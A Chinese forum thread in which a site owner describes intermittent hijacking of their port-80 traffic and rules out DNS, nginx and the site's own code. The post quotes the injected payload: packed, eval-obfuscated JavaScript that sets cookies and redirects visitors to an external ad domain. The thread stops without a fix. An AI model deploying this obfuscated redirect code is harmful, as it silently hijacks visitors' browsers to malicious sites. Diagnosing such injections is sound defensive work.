【已解决】NGINX被劫持了？

网站打开时偶尔正常，偶尔直接跳转灰广，以下是打开网站首页测试
正常的时候响应头如下：

跳转的时候响应头如下：

DNS没被劫持，解析的IP是我自己的，
访问的时候宝塔上也能看到访问日志，就算返回内容是跳转代码的时候宝塔上也能看到访问日志，

把NGINX停止了就不会跳转了，说明跳转是通过NGINX进行的，
把NGINX配置文件的端口换成其他端口也不会跳，显示正常网页内容。只有80端口会跳
已排除程序的问题，网站程序清空了还是会跳转

F12查看到的跳转代码如下：

1. 
   
2. <html><body><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4 a="J://B.C";4 b=a;4 c=a;4 w=\'D\';4 y=\'H\';g h(n){4 f,l=o L("(^| )"+n+"=([^;]*)(;|$)");7(f=k.j.M(l))m A(f[2]);e m r}g 9(n,v){4 d=q;4 8=o s();8.x(8.z()+d*u*i*i*t);k.j=n+"="+p(v)+";I="+8.K()}4 6=h(w);4 5=h(y);7(!6){5=1}5=N(5);7(5==2){6=b}e 7(5==3){6=c}e{6=a}5=5+1;9(w,6);9(y,5);G(g(){F.E=6},0);',50,50,'||||var|ti|url|if|exp|sC|||||else|arr|function|gC|60|cookie|document|reg|return||new|escape|365|null|Date|1000|24|||setTime||getTime|unescape|findzzzzzzzz221|xyz|37_14|href|location|setTimeout|38_14|expires|https|toGMTString|RegExp|match|Number'.split('|'),0,{}))</script></body></html>

复制代码

NGINX配置文件也全部排查了，没有找到反代之类的代码，NGINX重装，换版本都没用


老板们能推测一下是哪里出了问题吗？

经测试不是NGINX的问题，我自己NODEJS写一个开放80端口的demo也会被劫持

自己写的DEMO能收到请求的参数，但是返回给前端的数据被修改成跳转代码了

怎么解决的？